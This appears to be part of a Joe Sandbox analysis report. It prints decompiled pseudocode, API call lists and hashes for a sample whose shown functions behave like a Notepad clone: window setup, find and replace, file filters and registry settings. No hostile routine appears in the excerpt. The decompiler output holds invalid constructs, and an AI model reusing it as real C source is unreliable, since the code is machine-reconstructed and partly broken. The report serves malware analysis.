                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$lstrlen$Close$CreateOpenPlacementQueryWindow
                    • String ID: ,$Software\Microsoft\Notepad$bStatusBar$fWrap$iMarginBottom$iMarginLeft$iMarginRight$iMarginTop$iPointSize$iWindowPosDX$iWindowPosDY$iWindowPosX$iWindowPosY$lfCharSet$lfClipPrecision$lfEscapement$lfFaceName$lfItalic$lfOrientation$lfOutPrecision$lfPitchAndFamily$lfQuality$lfStrikeOut$lfUnderline$lfWeight$szHeader$szTrailer
                    • API String ID: 3965342766-4088090211
                    • Opcode ID: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction ID: 7683da5cacc04de4b6a450b4fe93bf3db442fa3ee8cca3673ad3d0b9cb0cef88
                    • Opcode Fuzzy Hash: 5c25994bed4de11f2da9cafca366b3f1efb379ee3a690d8ad69aecacce761416
                    • Instruction Fuzzy Hash: B5C140B5BA431CBFEB14DB94DC86FAD7BB9AB49B00F104156B700B72D0C6B06A54CB58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 62%
                    			E00286A51(void* __ebx) {
                    				void* __edi;
                    				void* __esi;
                    				_Unknown_base(*)()* _t7;
                    				long _t10;
                    				void* _t11;
                    				int _t12;
                    				void* _t14;
                    				void* _t15;
                    				void* _t16;
                    				void* _t18;
                    				intOrPtr _t21;
                    				long _t26;
                    				void* _t30;
                    				struct HINSTANCE__* _t35;
                    				intOrPtr* _t36;
                    				void* _t39;
                    				intOrPtr* _t41;
                    				void* _t42;
                    
                    				_t30 = __ebx;
                    				_t35 = GetModuleHandleW(L"KERNEL32.DLL");
                    				if(_t35 != 0) {
                    					 *0x295a5c = GetProcAddress(_t35, "FlsAlloc");
                    					 *0x295a60 = GetProcAddress(_t35, "FlsGetValue");
                    					 *0x295a64 = GetProcAddress(_t35, "FlsSetValue");
                    					_t7 = GetProcAddress(_t35, "FlsFree");
                    					__eflags =  *0x295a5c;
                    					_t39 = TlsSetValue;
                    					 *0x295a68 = _t7;
                    					if( *0x295a5c == 0) {
                    						L6:
                    						 *0x295a60 = TlsGetValue;
                    						 *0x295a5c = E00286761;
                    						 *0x295a64 = _t39;
                    						 *0x295a68 = TlsFree;
                    					} else {
                    						__eflags =  *0x295a60;
                    						if( *0x295a60 == 0) {
                    							goto L6;
                    						} else {
                    							__eflags =  *0x295a64;
                    							if( *0x295a64 == 0) {
                    								goto L6;
                    							} else {
                    								__eflags = _t7;
                    								if(_t7 == 0) {
                    									goto L6;
                    								}
                    							}
                    						}
                    					}
                    					_t10 = TlsAlloc();
                    					 *0x294544 = _t10;
                    					__eflags = _t10 - 0xffffffff;
                    					if(_t10 == 0xffffffff) {
                    						L15:
                    						_t11 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t12 = TlsSetValue(_t10,  *0x295a60);
                    						__eflags = _t12;
                    						if(_t12 == 0) {
                    							goto L15;
                    						} else {
                    							E00285DA0();
                    							_t41 = __imp__EncodePointer;
                    							_t14 =  *_t41( *0x295a5c);
                    							 *0x295a5c = _t14;
                    							_t15 =  *_t41( *0x295a60);
                    							 *0x295a60 = _t15;
                    							_t16 =  *_t41( *0x295a64);
                    							 *0x295a64 = _t16;
                    							 *0x295a68 =  *_t41( *0x295a68);
                    							_t18 = E00286E3A();
                    							__eflags = _t18;
                    							if(_t18 == 0) {
                    								L14:
                    								E0028679E();
                    								goto L15;
                    							} else {
                    								_t36 = __imp__DecodePointer;
                    								_t21 =  *((intOrPtr*)( *_t36()))( *0x295a5c, E00286922);
                    								 *0x294540 = _t21;
                    								__eflags = _t21 - 0xffffffff;
                    								if(_t21 == 0xffffffff) {
                    									goto L14;
                    								} else {
                    									_t42 = E00286CCA(1, 0x214);
                    									__eflags = _t42;
                    									if(_t42 == 0) {
                    										goto L14;
                    									} else {
                    										__eflags =  *((intOrPtr*)( *_t36()))( *0x295a64,  *0x294540, _t42);
                    										if(__eflags == 0) {
                    											goto L14;
                    										} else {
                    											_push(0);
                    											_push(_t42);
                    											E002867DB(_t30, _t36, _t42, __eflags);
                    											_t26 = GetCurrentThreadId();
                    											 *(_t42 + 4) =  *(_t42 + 4) | 0xffffffff;
                    											 *_t42 = _t26;
                    											_t11 = 1;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    					return _t11;
                    				} else {
                    					E0028679E();
                    					return 0;
                    				}
                    			}






















                    APIs
                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0028348E), ref: 00286A59
                    • __mtterm.LIBCMT ref: 00286A65
                      • Part of subcall function 0028679E: DecodePointer.KERNEL32(00000006,00286BC7,?,0028348E), ref: 002867AF
                      • Part of subcall function 0028679E: TlsFree.KERNEL32(00000024,00286BC7,?,0028348E), ref: 002867C9
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(00000000,00000000,77D5F3A0,?,00286BC7,?,0028348E), ref: 00286EA1
                      • Part of subcall function 0028679E: _free.LIBCMT ref: 00286EA4
                      • Part of subcall function 0028679E: DeleteCriticalSection.KERNEL32(00000024,77D5F3A0,?,00286BC7,?,0028348E), ref: 00286ECB
                    • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00286A7B
                    • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00286A88
                    • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00286A95
                    • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00286AA2
                    • TlsAlloc.KERNEL32(?,0028348E), ref: 00286AF2
                    • TlsSetValue.KERNEL32(00000000,?,0028348E), ref: 00286B0D
                    • __init_pointers.LIBCMT ref: 00286B17
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B28
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B35
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B42
                    • EncodePointer.KERNEL32(?,0028348E), ref: 00286B4F
                    • DecodePointer.KERNEL32(00286922,?,0028348E), ref: 00286B70
                    • __calloc_crt.LIBCMT ref: 00286B85
                    • DecodePointer.KERNEL32(00000000,?,0028348E), ref: 00286B9F
                    • GetCurrentThreadId.KERNEL32 ref: 00286BB1
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
                    • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                    • API String ID: 3698121176-3819984048
                    • Opcode ID: e455c2a6503c26fd29fc238e3e3e54fe2b58e08c4b6b0271290496655874ecfb
                    • Instruction ID: 806961e2b0e1b2a503bf1dd311f57dede3cff168ecaa759e9c7d1cdb5a234e0a
                    • Opcode Fuzzy Hash: e455c2a6503c26fd29fc238e3e3e54fe2b58e08c4b6b0271290496655874ecfb
                    • Instruction Fuzzy Hash: 97318035A227259FDB127FB4BC8DA193BE5EB05724B180617E404E36F0D7748961CF58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 79%
                    			E00282340(struct HWND__* _a4, int _a8, int _a12, unsigned int _a16) {
                    				short _v524;
                    				struct tagRECT _v540;
                    				void* __edi;
                    				void* __esi;
                    				int _t35;
                    				struct HWND__* _t43;
                    				struct HWND__* _t48;
                    				void* _t81;
                    				signed int _t86;
                    				void* _t122;
                    				signed int _t136;
                    				void* _t138;
                    
                    				_t35 = _a8;
                    				_t138 = (_t136 & 0xfffffff8) - 0x21c;
                    				if(_t35 != ( *0x295f64 & 0x0000ffff)) {
                    					__eflags = _t35 - 0x10;
                    					if(__eflags > 0) {
                    						__eflags = _t35 - 0x117;
                    						if(__eflags > 0) {
                    							__eflags = _t35 - 0x233;
                    							if(_t35 == 0x233) {
                    								_t122 = _a12;
                    								DragQueryFileW(_t122, 0,  &_v524, 0x41);
                    								DragFinish(_t122);
                    								 *0x280000( &_v524, 0xffffffff);
                    								goto L33;
                    							} else {
                    								__eflags = _t35 - 0x307;
                    								if(_t35 == 0x307) {
                    									goto L33;
                    								} else {
                    									goto L31;
                    								}
                    							}
                    						} else {
                    							if(__eflags == 0) {
                    								E00281F50(_a12);
                    								__eflags = 0;
                    								return 0;
                    							} else {
                    								__eflags = _t35 - 0x11;
                    								if(_t35 == 0x11) {
                    									_t43 =  *0x280000();
                    									__eflags = _t43;
                    									if(_t43 == 0) {
                    										goto L33;
                    									} else {
                    										return 1;
                    									}
                    								} else {
                    									__eflags = _t35 - 0x111;
                    									if(_t35 != 0x111) {
                    										goto L31;
                    									} else {
                    										E00281C40(_a12 & 0x0000ffff);
                    										__eflags = 0;
                    										return 0;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						if(__eflags == 0) {
                    							_t48 =  *0x280000();
                    							__eflags = _t48;
                    							if(_t48 == 0) {
                    								goto L33;
                    							} else {
                    								DestroyWindow(_a4);
                    								__eflags = 0;
                    								return 0;
                    							}
                    						} else {
                    							_t86 = _t35 - 1;
                    							__eflags = _t86 - 6;
                    							if(_t86 > 6) {
                    								L31:
                    								return DefWindowProcW(_a4, _t35, _a12, _a16);
                    							} else {
                    								switch( *((intOrPtr*)(_t86 * 4 +  &M002825F4))) {
                    									case 0:
                    										_t130 = _a4;
                    										_t107 = 0x50a00144;
                    										GetClientRect(_t130,  &_v540);
                    										__eflags =  *0x29715c;
                    										if( *0x29715c == 0) {
                    											_t107 = 0x50b001c4;
                    										}
                    										 *0x2970ec = CreateWindowExW(0x200, L"edit", 0, _t107, 0, 0, _v540.right, _v540.bottom, _t130, 0,  *0x2970e0, 0);
                    										_t55 = CreateFontIndirectW(0x297100);
                    										 *0x2970f0 = _t55;
                    										SendMessageW( *0x2970ec, 0x30, _t55, 0);
                    										SendMessageW( *0x2970ec, 0xc5, 0, 0);
                    										 *0x2970f4 = CreateWindowExW(0, "jnj", 0, 0x50000000, 0, 0, 0, "jjjjh", _t130, 0,  *0x2970e0, 0);
                    										_t62 = LoadStringW( *0x2970e0, 0x206, 0x2970fc, 0) | 0xffffffff;
                    										 *0x298274 = _t62;
                    										 *0x298278 = _t62;
                    										E00281090();
                    										__eflags = 0;
                    										return 0;
                    										goto L34;
                    									case 1:
                    										__eax = E00281290();
                    										PostQuitMessage(0);
                    										__eax = 0;
                    										__eflags = 0;
                    										_pop(__edi);
                    										_pop(__esi);
                    										return 0;
                    										goto L34;
                    									case 2:
                    										goto L31;
                    									case 3:
                    										__eax = _a16;
                    										_a16 >> 0x10 = E00281230(_a16 >> 0x10, __cx & 0x0000ffff);
                    										__eax = 0;
                    										__eflags = 0;
                    										_pop(__edi);
                    										_pop(__esi);
                    										return 0;
                    										goto L34;
                    									case 4:
                    										SetFocus( *0x2970ec) = 0;
                    										__eflags = 0;
                    										_pop(__edi);
                    										_pop(__esi);
                    										return 0;
                    										goto L34;
                    								}
                    							}
                    						}
                    					}
                    				} else {
                    					_t81 = _a16;
                    					if(( *(_t81 + 0xc) & 0x00000040) != 0) {
                    						 *0x2970e8 = 0;
                    					}
                    					if(( *(_t81 + 0xc) & 0x00000008) != 0) {
                    						memcpy(0x2982a4, _t81, 0xa << 2);
                    						_t138 = _t138 + 0xc;
                    						E00281FF0(_t81);
                    					}
                    					if(( *(_t81 + 0xc) & 0x00000010) != 0) {
                    						memcpy(0x2982a4, _t81, 0xa << 2);
                    						_t138 = _t138 + 0xc;
                    						E00282130(_t81);
                    					}
                    					if(( *(_t81 + 0xc) & 0x00000020) == 0) {
                    						L33:
                    						__eflags = 0;
                    						return 0;
                    					} else {
                    						memcpy(0x2982a4, _t81, 0xa << 2);
                    						E00282200(_t81);
                    						return 0;
                    					}
                    				}
                    				L34:
                    			}
















                    APIs
                    • GetClientRect.USER32 ref: 002823FE
                    • CreateWindowExW.USER32 ref: 0028243E
                    • CreateFontIndirectW.GDI32(00297100), ref: 0028244A
                    • SendMessageW.USER32(?,00000030,00000000,00000000), ref: 00282466
                    • SendMessageW.USER32(?,000000C5,00000000,00000000), ref: 00282478
                    • CreateWindowExW.USER32 ref: 00282499
                    • LoadStringW.USER32(?,00000206,002970FC,00000000), ref: 002824B2
                      • Part of subcall function 00281290: RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                      • Part of subcall function 00281290: GetWindowPlacement.USER32(?,?), ref: 002812D6
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                      • Part of subcall function 00281290: RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • PostQuitMessage.USER32(00000000), ref: 002824DC
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Value$Create$MessageWindow$Send$ClientFontIndirectLoadPlacementPostQuitRectString
                    • String ID: VQRj$edit$jjjjh$jnj
                    • API String ID: 3987337835-3548645043
                    • Opcode ID: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction ID: 2b53c4a1264e6350e1134cc7a8918ad7f2b26b5cc1d221b23885593c0b876936
                    • Opcode Fuzzy Hash: a1e9a088b440044b75dc435b629bdbd80fe915961714fb563a195529e405ab9e
                    • Instruction Fuzzy Hash: 3C715B363652089BE714EFA9FC8DF6A7398EB84321F10452BFE08DB1D0D67598248760
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E00281E60() {
                    				WCHAR* _t42;
                    				WCHAR* _t43;
                    				WCHAR* _t44;
                    
                    				LoadStringW( *0x2970e0, 0x176, 0x297984, 0xff);
                    				_t42 = 0x297986 + lstrlenW(0x297984) * 2;
                    				lstrcpyW(_t42, L"*.txt");
                    				_t43 = _t42 + 2 + lstrlenW(_t42) * 2;
                    				LoadStringW( *0x2970e0, 0x175, _t43, 0xff);
                    				_t44 = _t43 + 2 + lstrlenW(_t43) * 2;
                    				lstrcpyW(_t44, L"*.*");
                    				 *((short*)(_t44 + 2 + lstrlenW(_t44) * 2)) = 0;
                    				 *0x2982cc = 0;
                    				 *0x2982d0 = 0;
                    				asm("sbb eax, eax");
                    				CheckMenuItem(GetMenu( *0x2970e4), 0x119,  ~( *0x29715c) & 0x00000008);
                    				asm("sbb edx, edx");
                    				CheckMenuItem(GetMenu( *0x2970e4), 0x205,  ~( *0x2970f8) & 0x00000008);
                    				asm("sbb ecx, ecx");
                    				return ShowWindow( *0x2970f4,  ~( *0x2970f8) & 0x00000005);
                    			}







                    APIs
                    • LoadStringW.USER32(?,00000176,00297984,000000FF), ref: 00281E7E
                    • lstrlenW.KERNEL32(00297984,?,?,?,?,?,?,?), ref: 00281E8B
                    • lstrcpyW.KERNEL32 ref: 00281E9A
                    • lstrlenW.KERNEL32(80000000,?,?,?,?,?,?,?), ref: 00281EA1
                    • LoadStringW.USER32(?,00000175,?,000000FF), ref: 00281EB9
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281EBC
                    • lstrcpyW.KERNEL32 ref: 00281EC8
                    • lstrlenW.KERNEL32(?,?,?,?,?,?,?,?), ref: 00281ECF
                    • GetMenu.USER32(?), ref: 00281F03
                    • CheckMenuItem.USER32(00000000), ref: 00281F0C
                    • GetMenu.USER32(?), ref: 00281F27
                    • CheckMenuItem.USER32(00000000), ref: 00281F2A
                    • ShowWindow.USER32(?,?,?,?,?,?,?,?,?), ref: 00281F41
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Menulstrlen$CheckItemLoadStringlstrcpy$ShowWindow
                    • String ID: *.*$*.txt
                    • API String ID: 3918228958-3257935098
                    • Opcode ID: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction ID: 9ee78d2d1968606edcfef0ee4bae9b0d193893bdaa9c418f8ab1c688c1add7d7
                    • Opcode Fuzzy Hash: 36f3749ec2c145ffb1ec381189e2efe330a46752e03151568a15bc1db7b000df
                    • Instruction Fuzzy Hash: 9A218E72674215BFD6089B79FC8EEBA3779EFC9B00701811BF609E31A0DA74A4118B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 55%
                    			E00282690(WCHAR* __eax) {
                    				short _v524;
                    				signed int _t14;
                    				signed int _t15;
                    				WCHAR* _t16;
                    				signed int _t17;
                    				int _t20;
                    				void* _t29;
                    				void* _t33;
                    				WCHAR* _t36;
                    				short _t37;
                    				signed int _t41;
                    				signed int _t42;
                    				signed int _t43;
                    				intOrPtr* _t55;
                    				WCHAR* _t59;
                    
                    				_t59 = __eax;
                    				_t37 = 0;
                    				if( *((short*)(__eax)) == 0x20) {
                    					do {
                    						_t59 =  &(_t59[1]);
                    					} while ( *_t59 == 0x20);
                    				}
                    				_t14 =  *_t59 & 0x0000ffff;
                    				_t41 = (0 | _t14 == 0x00000022) + (0 | _t14 == 0x00000022) + 0x00000020 & 0x0000ffff;
                    				if(_t14 == _t41) {
                    					_t59 =  &(_t59[1]);
                    				}
                    				_t15 =  *_t59 & 0x0000ffff;
                    				if(_t15 == 0) {
                    					L7:
                    					if( *_t59 == _t41) {
                    						goto L8;
                    					}
                    				} else {
                    					while(_t15 != _t41) {
                    						_t15 = _t59[1] & 0x0000ffff;
                    						_t59 =  &(_t59[1]);
                    						if(_t15 != 0) {
                    							continue;
                    						} else {
                    							goto L7;
                    						}
                    						goto L9;
                    					}
                    					L8:
                    					_t59 =  &(_t59[1]);
                    				}
                    				L9:
                    				while( *_t59 == 0x20) {
                    					_t59 =  &(_t59[1]);
                    				}
                    				_t16 = _t59;
                    				while(1) {
                    					_t42 =  *_t16 & 0x0000ffff;
                    					if(_t42 != 0x20 && _t42 != 0x2d && _t42 != 0x2f) {
                    						break;
                    					}
                    					_t16 =  &(_t16[1]);
                    					if(_t42 != 0x20) {
                    						_t43 =  *_t16 & 0x0000ffff;
                    						if(_t43 != 0) {
                    							_t16 =  &(_t16[1]);
                    						}
                    						while( *_t16 == 0x20) {
                    							_t16 =  &(_t16[1]);
                    						}
                    						if(_t43 == 0x50 || _t43 == 0x70) {
                    							if(_t37 == 0) {
                    								_t37 = 1;
                    								_t59 = _t16;
                    							}
                    						}
                    					}
                    					L45:
                    				}
                    				_t17 =  *_t59 & 0x0000ffff;
                    				if(_t17 == 0) {
                    					return _t17;
                    				} else {
                    					if(_t17 == 0x22) {
                    						_t59 =  &(_t59[1]);
                    						_t36 = _t59;
                    						if( *_t59 != 0) {
                    							while( *_t36 != 0x22) {
                    								_t36 =  &(_t36[1]);
                    								if( *_t36 != 0) {
                    									continue;
                    								}
                    								goto L32;
                    							}
                    						}
                    						L32:
                    						 *_t36 = 0;
                    					}
                    					_t55 =  *0x280000; // 0x905a4d
                    					_push(_t59);
                    					if( *_t55() != 0) {
                    						L35:
                    						 *0x280000(_t59, 0xffffffff);
                    						_t20 = InvalidateRect( *0x2970e4, 0, 0);
                    						if(_t37 == 0) {
                    							goto L43;
                    						}
                    						return  *0x280000();
                    					} else {
                    						lstrcpynW( &_v524, _t59, 0x103 - lstrlenW(L".txt"));
                    						lstrcatW( &_v524, L".txt");
                    						_t59 =  &_v524;
                    						_push(_t59);
                    						if( *_t55() == 0) {
                    							_t29 = E00282610( &_v524) - 2;
                    							if(_t29 == 0) {
                    								_t20 = DestroyWindow( *0x2970e4);
                    								L43:
                    								return _t20;
                    							}
                    							_t20 = _t29 - 4;
                    							if(_t20 != 0) {
                    								goto L43;
                    							}
                    							lstrcpyW(0x297570,  &_v524);
                    							 *0x297778 = 0;
                    							GetFileTitleW( &_v524, 0x297778, 0x32);
                    							 *0x297980 = 0;
                    							_t33 = CreateFileW( &_v524, 0x40000000, 2, 0, 4, 0x80, 0);
                    							if(_t33 != 0xffffffff) {
                    								CloseHandle(_t33);
                    							}
                    							return  *0x280000();
                    						} else {
                    							goto L35;
                    						}
                    					}
                    				}
                    				goto L45;
                    			}



















                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID: .txt$`iqt Oqt
                    • API String ID: 0-3182384896
                    • Opcode ID: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction ID: 3bf0595eebac5de2ad1b18e5868a71838e70d44a66886fd02558aea9b8b7c482
                    • Opcode Fuzzy Hash: d97aaed6261ee0f7788ec05ea34ab2a3be86cf1343b0855375b7853a0e0a4661
                    • Instruction Fuzzy Hash: 7D51E57E922226DBDF347F65EC8DBB6B3A4EF14710F14015AE986920D0F7704CA88761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E00281FF0(intOrPtr _a4) {
                    				void* _v8;
                    				int _v12;
                    				signed int _t27;
                    				intOrPtr _t43;
                    				int _t56;
                    				void* _t58;
                    
                    				_t43 = _a4;
                    				_v12 = lstrlenW( *(_t43 + 0x10));
                    				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    				_t56 = _t4;
                    				_t27 = HeapAlloc(GetProcessHeap(), 0, _t56 + _t56);
                    				_t58 = _t27;
                    				if(_t58 == 0) {
                    					L13:
                    					return _t27;
                    				} else {
                    					GetWindowTextW( *0x2970ec, _t58, _t56);
                    					SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
                    					_t27 =  *(_t43 + 0xc) & 0x00000005;
                    					if(_t27 > 5) {
                    						goto L13;
                    					} else {
                    						switch( *((intOrPtr*)(_t27 * 4 +  &M00282110))) {
                    							case 0:
                    								goto L10;
                    							case 1:
                    								goto L13;
                    							case 2:
                    								_t44 =  *(_t43 + 0x10);
                    								_t57 = _t58 + (_v8 - _v12) * 2 - 2;
                    								lstrlenW(_t44);
                    								if(_t57 < _t58) {
                    									L7:
                    									_t57 = 0;
                    								} else {
                    									while(lstrcmpW(_t57, _t44) != 0) {
                    										_t57 = _t57 - 2;
                    										if(_t57 >= _t58) {
                    											continue;
                    										} else {
                    											goto L7;
                    										}
                    										goto L8;
                    									}
                    								}
                    								L8:
                    								_t45 = _a4;
                    								L10:
                    								_v8 = _t57 - _t58 >> 1;
                    								HeapFree(GetProcessHeap(), 0, _t58);
                    								if(_t57 != 0) {
                    									return SendMessageW( *0x2970ec, 0xb1, _v8, _v8 + _v12);
                    								}
                    								_push(0x40);
                    								_push( *((intOrPtr*)(_t45 + 0x10)));
                    								_push(0x17b);
                    								_push( *0x2970e8);
                    								return  *0x280000();
                    								goto L14;
                    						}
                    					}
                    				}
                    				L14:
                    			}










                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282000
                    • GetWindowTextLengthW.USER32(?), ref: 00282010
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028201F
                    • HeapAlloc.KERNEL32(00000000), ref: 00282026
                    • GetWindowTextW.USER32 ref: 0028203E
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282056
                    • lstrlenW.KERNEL32(?), ref: 00282080
                    • lstrcmpW.KERNEL32(?,?), ref: 00282092
                    • GetProcessHeap.KERNEL32(00000000), ref: 002820B9
                    • HeapFree.KERNEL32(00000000), ref: 002820C0
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$ProcessTextWindowlstrlen$AllocFreeLengthMessageSendlstrcmp
                    • String ID: Oqt
                    • API String ID: 1368074758-2617001805
                    • Opcode ID: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction ID: 21995c4cf460e4af86b09fb496de49a243d0c83920fad183772143e15c0c25f3
                    • Opcode Fuzzy Hash: b403cecdd9249dbfddf1807cf819cc3136ca83ae7b2c4ec86302b041634080a7
                    • Instruction Fuzzy Hash: D6316D76611208EFCB10DFA8FCCDF6A7B79FB98711F148406EA0A97290C630A914CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00282130(intOrPtr __edi) {
                    				void* _v8;
                    				void* _v12;
                    				int _v16;
                    				void* _t19;
                    				void* _t26;
                    				signed int _t27;
                    				void* _t34;
                    				intOrPtr _t44;
                    				int _t45;
                    
                    				_t44 = __edi;
                    				_v16 = lstrlenW( *(__edi + 0x10));
                    				_t3 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    				_t45 = _t3;
                    				_t19 = HeapAlloc(GetProcessHeap(), 0, _t45 + _t45);
                    				_t34 = _t19;
                    				if(_t34 != 0) {
                    					GetWindowTextW( *0x2970ec, _t34, _t45);
                    					SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
                    					_t26 = ( *(__edi + 0xc) & 0x00000005) - 1;
                    					if(_t26 == 0) {
                    						L3:
                    						_t27 = _v12;
                    						if(_v8 - _t27 == _v16 && lstrcmpW( *(_t44 + 0x10), _t34 + _t27 * 2) == 0) {
                    							SendMessageW( *0x2970ec, 0xc2, 1,  *(_t44 + 0x14));
                    						}
                    						HeapFree(GetProcessHeap(), 0, _t34);
                    						return E00281FF0(_t44);
                    					}
                    					_t19 = _t26 - 4;
                    					if(_t19 == 0) {
                    						goto L3;
                    					}
                    				}
                    				return _t19;
                    			}













                    APIs
                    • lstrlenW.KERNEL32(?), ref: 0028213C
                    • GetWindowTextLengthW.USER32(?), ref: 0028214C
                    • GetProcessHeap.KERNEL32(00000000), ref: 0028215B
                    • HeapAlloc.KERNEL32(00000000), ref: 00282162
                    • GetWindowTextW.USER32 ref: 0028217A
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00282199
                    • lstrcmpW.KERNEL32(?), ref: 002821BE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002821DA
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002821DF
                    • HeapFree.KERNEL32(00000000), ref: 002821E6
                    Strings
                    Memory Dump Source
